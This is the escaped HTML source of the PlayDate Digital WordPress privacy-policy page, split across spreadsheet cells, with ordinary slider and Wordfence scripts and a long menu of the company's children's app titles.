&lt;link rel='stylesheet' id='fusion-dynamic-css-css'  href='https://playdatedigital.com/wp-content/uploads/fusion-styles/fusion-150.min.css?timestamp=1680852870&amp;#038;ver=4.9.22' type='text/css' media='all' /&gt;
&lt;script type='text/javascript'&gt;
/* &lt;!</t>
  </si>
  <si>
    <t>[CDATA[ */
var LS_Meta = {"v":"6.5.5"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' data-cfasync="false" src='https://playdatedigital.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://playdatedigital.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://playdatedigital.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'&gt;&lt;/script&gt;
&lt;script type='text/javascript' data-cfasync="false" src='https://playdatedigital.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedia.jquery.js?ver=6.5.5'&gt;&lt;/script&gt;
&lt;script type='text/javascript' data-cfasync="false" src='https://playdatedigital.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.transitions.js?ver=6.5.5'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://playdatedigital.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.5.1'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://playdatedigital.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.5.1'&gt;&lt;/script&gt;
&lt;meta name="generator" content="Powered by LayerSlider 6.5.5 - Multi-Purpose, Responsive, Parallax, Mobile-Friendly Slider Plugin for WordPress." /&gt;_x005F_x000D_
&lt;!-- LayerSlider updates and docs at: https://layerslider.kreaturamedia.com</t>
  </si>
  <si>
    <t>--&gt;_x005F_x000D_
&lt;link rel='https://api.w.org/' href='https://playdatedigital.com/wp-json/' /&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://playdatedigital.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://playdatedigital.com/wp-includes/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 4.9.22" /&gt;
&lt;link rel="canonical" href="https://playdatedigital.com/privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://playdatedigital.com/?p=150' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://playdatedigital.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fplaydatedigital.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://playdatedigital.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fplaydatedigital.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;meta name="cdp-version" content="1.3.7" /&gt;&lt;script type="text/javascript"&gt;
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)) { return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress</t>
  </si>
  <si>
    <t>keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		if (window.wfLogHumanRan) { return; }
		window.wfLogHumanRan = true;
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&amp;r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i &lt; evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i &lt; evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//playdatedigital.com/?wordfence_lh=1&amp;hid=CEF9792FCC6D6F9FB0CF39FEDE772415');
&lt;/script&gt;		&lt;style type="text/css"&gt;.recentcomments a{display:inline !important;padding:0 !important;margin:0 ! important;}&lt;/style&gt;
		&lt;meta name="generator" content="Powered by Slider Revolution 5.4.5.1 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /&gt;
		&lt;script type="text/javascript"&gt;function setREVStartSize(e){_x005F_x000D_
				try{ var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0;					_x005F_x000D_
					if(e.responsiveLevels&amp;&amp;(jQuery.each(e.responsiveLevels,function(e,f){f&gt;i&amp;&amp;(t=r=f,l=e),i&gt;f&amp;&amp;f&gt;r&amp;&amp;(r=f,n=e)}),t&gt;r&amp;&amp;(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h&gt;1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length&gt;0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length&gt;1&amp;&amp;void 0!=e.fullScreenOffset&amp;&amp;e.fullScreenOffset.length&gt;0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&amp;&amp;e.fullScreenOffset.length&gt;0&amp;&amp;(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&amp;&amp;f&lt;e.minHeight&amp;&amp;(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f})					_</t>
  </si>
  <si>
    <t>x000D_
				}catch(d){console.log("Failure at Presize of Slider:"+d)}_x005F_x000D_
			};&lt;/script&gt;
	&lt;script type="text/javascript"&gt;
		var doc = document.documentElement;
		doc.setAttribute('data-useragent', navigator.userAgent);
	&lt;/script&gt;
	&lt;/head&gt;
&lt;body class="page-template-default page page-id-150 fusion-image-hovers fusion-body ltr fusion-sticky-header no-tablet-sticky-header no-mobile-sticky-header no-mobile-slidingbar no-mobile-totop mobile-logo-pos-left layout-boxed-mode layout-boxed-mode-full fusion-top-header menu-text-align-center mobile-menu-design-modern fusion-show-pagination-text fusion-header-layout-v1 avada-responsive avada-footer-fx-none fusion-search-form-classic fusion-avatar-square"&gt;
	&lt;a class="skip-link screen-reader-text" href="#content"&gt;Skip to content&lt;/a&gt;
				&lt;div id="wrapper" class=""&gt;
		&lt;div id="home" style="position:relative;top:-1px;"&gt;&lt;/div&gt;
			&lt;header class="fusion-header-wrapper"&gt;
				&lt;div class="fusion-header-v1 fusion-logo-left fusion-sticky-menu-1 fusion-sticky-logo- fusion-mobile-logo-  fusion-mobile-menu-design-modern"&gt;
					&lt;div class="fusion-header-sticky-height"&gt;&lt;/div&gt;
&lt;div class="fusion-header"&gt;
	&lt;div class="fusion-row"&gt;
					&lt;div class="fusion-logo" data-margin-top="31px" data-margin-bottom="31px" data-margin-left="0px" data-margin-right="0px"&gt;
			&lt;a class="fusion-logo-link"  href="https://playdatedigital.com/" &gt;
						&lt;!-- standard logo --&gt;
			&lt;img src="https://playdatedigital.com/wp-content/uploads/2022/07/PlayDateDigital.png" srcset="https://playdatedigital.com/wp-content/uploads/2022/07/PlayDateDigital.png 1x, https://playdatedigital.com/wp-content/uploads/2022/07/PlayDateDigitalx2.png 2x" width="253" height="73" style="max-height:73px;height:auto;" alt="PlayDate Digital Logo" retina_logo_url="https://playdatedigital.com/wp-content/uploads/2022/07/PlayDateDigitalx2.png" class="fusion-standard-logo" /&gt;
					&lt;/a&gt;
		&lt;/div&gt;		&lt;nav class="fusion-main-menu" aria-label="Main Menu"&gt;&lt;ul role="menubar" id="menu-main" class="fusion-menu"&gt;&lt;li role="menuitem"  id="menu-item-15"  class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15"  &gt;&lt;a  href="/" class="fusion-background-highlight"&gt;&lt;span class="menu-text"&gt;home&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-17"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-17 fusion-dropdown-menu"  &gt;&lt;a  href="https://playdatedigital.com/products/" class="fusion-background-highlight"&gt;&lt;span class="menu-text"&gt;products&lt;/span&gt;&lt;/a&gt;&lt;ul role="menu" class="sub-menu"&gt;&lt;li role="menuitem"  id="menu-item-1604"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1604 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/scrabble-junior/" class="fusion-background-highlight"&gt;&lt;span&gt;Scrabble Junior&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-1565"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1565 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/power-rangers-beast-morphers/" class="fusion-background-highlight"&gt;&lt;span&gt;Power Rangers: Beast Morphers&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-1497"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1497 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/baby-einstein/" class="fusion-background-highlight"&gt;&lt;span&gt;Baby Einstein: Storytime&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-1458"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1458 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/monopolyjunior/" class="fusion-background-highlight"&gt;&lt;span&gt;Monopoly Junior&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-1410"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1410 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/candyland/" class="fusion-background-highlight"&gt;&lt;span&gt;Candy Land: The Land of Sweet Adventures&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-1277"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1277 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/operation/" class="fusion-background-highlight"&gt;&lt;span&gt;Operation: Hasbro’s Classic Board Game&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-1145"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1145 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/chutes-and-ladders-ups-and-downs/" class="fusion-background-highlight"&gt;&lt;span&gt;Chutes and Ladders: Ups and Downs&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-1091"  class="menu-item menu-item-type-post_type menu-item-object-avada_portfolio menu-item-1091 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/portfolio-items/beat-bugs-sing-along/" class="fusion-background-highlight"&gt;&lt;span&gt;Beat Bugs: Sing Along&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-912"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-912 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/transformers-rescue-bots-need-for-speed/" class="fusion-background-highlight"&gt;&lt;span&gt;Transformers Rescue Bots: Need for Speed&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-844"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-844 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/my-little-pony-the-movie/" class="fusion-background-highlight"&gt;&lt;span&gt; My Little Pony: The Movie&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-807"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-807 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/tonka-trucks/" class="fusion-background-highlight"&gt;&lt;span&gt;Tonka: Trucks Around Town&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-755"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-755 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/care-bears-care-karts/" class="fusion-background-highlight"&gt;&lt;span&gt;Care Bears: Care Karts&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-747"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-747 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/transformers-rescue-bots-save-griffin-rock/" class="fusion-background-highlight"&gt;&lt;span&gt;Transformers Rescue Bots: Save Griffin Rock&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-722"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-722 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-lights-camera-ponies/" class="fusion-background-highlight"&gt;&lt;span&gt;My Little Pony: Lights, Camera, Ponies!&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-692"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-692 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/mr-potato-head-school-rush/" class="fusion-background-highlight"&gt;&lt;span&gt;Mr. Potato Head – School Rush&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-579"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-579 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/littlest-pet-shop-pet-style/" class="fusion-background-highlight"&gt;&lt;span&gt;Littlest Pet Shop: Pet Style&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-571"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-571 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/care-bears-sleepy-time-rise-and-shine/" class="fusion-background-highlight"&gt;&lt;span&gt;Care Bears Sleepy Time Rise and Shine&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-549"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-549 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-rarity-takes-manehattan/" class="fusion-background-highlight"&gt;&lt;span&gt;</t>
  </si>
  <si>
    <t>My Little Pony: Rarity Takes Manehattan&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-493"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-493 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/transformers-rescue-bots-dino-island/" class="fusion-background-highlight"&gt;&lt;span&gt;Transformers Rescue Bots: Dino Island&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-480"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-480 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-pinkie-pies-sister/" class="fusion-background-highlight"&gt;&lt;span&gt; My Little Pony: Pinkie Pie&amp;#8217;s Sister&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-455"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-455 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-cutie-pox/" class="fusion-background-highlight"&gt;&lt;span&gt; My Little Pony: Cutie Pox&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-441"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-441 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-twilights-kingdom/" class="fusion-background-highlight"&gt;&lt;span&gt;</t>
  </si>
  <si>
    <t>My Little Pony: Twilight&amp;#8217;s Kingdom&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-427"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-427 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/play-doh-seek-and-squish/" class="fusion-background-highlight"&gt;&lt;span&gt;Play-Doh: Seek and Squish&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-406"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-406 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-luna-eclipsed/" class="fusion-background-highlight"&gt;&lt;span&gt; My Little Pony: Luna Eclipsed&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-395"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-395 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-power-ponies/" class="fusion-background-highlight"&gt;&lt;span&gt;MY LITTLE PONY: Power Ponies&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-385"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-385 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/transformers-rescue-bots-sky-forest-rescue/" class="fusion-background-highlight"&gt;&lt;span&gt;Transformers Rescue Bots Sky Forest Rescue&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-349"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-349 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/my-little-pony-best-pet/" class="fusion-background-highlight"&gt;&lt;span&gt; MY LITTLE PONY:</t>
  </si>
  <si>
    <t>Best Pet&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-324"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-324 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/my-little-pony-fluttershys-famous-stare/" class="fusion-background-highlight"&gt;&lt;span&gt; MY LITTLE PONY: Fluttershy&amp;#8217;s Famous Stare&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-289"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-289 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/my-little-pony-hearts-and-hooves-day/" class="fusion-background-highlight"&gt;&lt;span&gt;MY LITTLE PONY: Hearts and Hooves Day&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-254"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-254 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/my-little-pony-party-of-one/" class="fusion-background-highlight"&gt;&lt;span&gt;MY LITTLE PONY: Party of One&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-23"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/play-doh-create-abcs/" class="fusion-background-highlight"&gt;&lt;span&gt;Play-Doh Create ABCs&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-256"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-256"  &gt;&lt;a  href="https://playdatedigital.com/news/" class="fusion-background-highlight"&gt;&lt;span class="menu-text"&gt;news&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-18"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18"  &gt;&lt;a  href="https://playdatedigital.com/our-team/" class="fusion-background-highlight"&gt;&lt;span class="menu-text"&gt;our team&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"  id="menu-item-16"  class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16"  &gt;&lt;a  href="https://playdatedigital.com/contact-us/" class="fusion-background-highlight"&gt;&lt;span class="menu-text"&gt;contact us&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="fusion-custom-menu-item fusion-main-menu-search"&gt;&lt;a class="fusion-main-menu-icon" href="#" aria-label="Search" data-title="Search" title="Search"&gt;&lt;/a&gt;&lt;div class="fusion-custom-menu-item-contents"&gt;&lt;form role="search" class="searchform fusion-search-form" method="get" action="https://playdatedigital.com/"&gt;
	&lt;div class="fusion-search-form-content"&gt;
		&lt;div class="fusion-search-field search-field"&gt;
			&lt;label class="screen-reader-text" for="s"&gt;Search for:&lt;/label&gt;
			&lt;input type="text" value="" name="s" class="s" placeholder="Search ..."</t>
  </si>
  <si>
    <t>required aria-required="true" aria-label="Search ..."/&gt;
		&lt;/div&gt;
		&lt;div class="fusion-search-button search-button"&gt;
			&lt;input type="submit" class="fusion-search-submit searchsubmit" value="&amp;#xf002;" /&gt;
		&lt;/div&gt;
	&lt;/div&gt;
&lt;/form&gt;
&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/nav&gt;&lt;nav class="fusion-main-menu fusion-sticky-menu" aria-label="Main Menu Sticky"&gt;&lt;ul role="menubar" id="menu-main-menu-1" class="fusion-menu"&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15"  &gt;&lt;a  href="/" class="fusion-background-highlight"&gt;&lt;span class="menu-text"&gt;home&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-17 fusion-dropdown-menu"  &gt;&lt;a  href="https://playdatedigital.com/products/" class="fusion-background-highlight"&gt;&lt;span class="menu-text"&gt;products&lt;/span&gt;&lt;/a&gt;&lt;ul role="menu" class="sub-menu"&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1604 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/scrabble-junior/" class="fusion-background-highlight"&gt;&lt;span&gt;Scrabble Junior&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1565 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/power-rangers-beast-morphers/" class="fusion-background-highlight"&gt;&lt;span&gt;Power Rangers: Beast Morphers&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1497 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/baby-einstein/" class="fusion-background-highlight"&gt;&lt;span&gt;Baby Einstein: Storytime&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1458 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/monopolyjunior/" class="fusion-background-highlight"&gt;&lt;span&gt;Monopoly Junior&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1410 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/candyland/" class="fusion-background-highlight"&gt;&lt;span&gt;Candy Land: The Land of Sweet Adventures&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1277 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/operation/" class="fusion-background-highlight"&gt;&lt;span&gt;Operation: Hasbro’s Classic Board Game&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1145 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/chutes-and-ladders-ups-and-downs/" class="fusion-background-highlight"&gt;&lt;span&gt;Chutes and Ladders: Ups and Downs&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-avada_portfolio menu-item-1091 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/portfolio-items/beat-bugs-sing-along/" class="fusion-background-highlight"&gt;&lt;span&gt;Beat Bugs: Sing Along&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-912 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/transformers-rescue-bots-need-for-speed/" class="fusion-background-highlight"&gt;&lt;span&gt;Transformers Rescue Bots: Need for Speed&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-844 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/my-little-pony-the-movie/" class="fusion-background-highlight"&gt;&lt;span&gt; My Little Pony: The Movie&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-807 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/products/tonka-trucks/" class="fusion-background-highlight"&gt;&lt;span&gt;Tonka: Trucks Around Town&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-755 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/care-bears-care-karts/" class="fusion-background-highlight"&gt;&lt;span&gt;Care Bears: Care Karts&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-747 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/transformers-rescue-bots-save-griffin-rock/" class="fusion-background-highlight"&gt;&lt;span&gt;Transformers Rescue Bots: Save Griffin Rock&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-722 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-lights-camera-ponies/" class="fusion-background-highlight"&gt;&lt;span&gt;My Little Pony: Lights, Camera, Ponies!&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-692 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/mr-potato-head-school-rush/" class="fusion-background-highlight"&gt;&lt;span&gt;Mr. Potato Head – School Rush&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-579 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/littlest-pet-shop-pet-style/" class="fusion-background-highlight"&gt;&lt;span&gt;Littlest Pet Shop: Pet Style&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-571 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/care-bears-sleepy-time-rise-and-shine/" class="fusion-background-highlight"&gt;&lt;span&gt;Care Bears Sleepy Time Rise and Shine&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-549 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-rarity-takes-manehattan/" class="fusion-background-highlight"&gt;&lt;span&gt; My Little Pony: Rarity Takes Manehattan&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-493 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/transformers-rescue-bots-dino-island/" class="fusion-background-highlight"&gt;&lt;span&gt;Transformers Rescue Bots: Dino Island&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li role="menuitem"   class="menu-item menu-item-type-post_type menu-item-object-page menu-item-480 fusion-dropdown-submenu"  &gt;&lt;a  href="https://playdatedigital.com/my-little-pony-pinkie-pies-sister/" class="fusion-background-highlight"&gt;&lt;span&gt;</t>
  </si>
  <si>
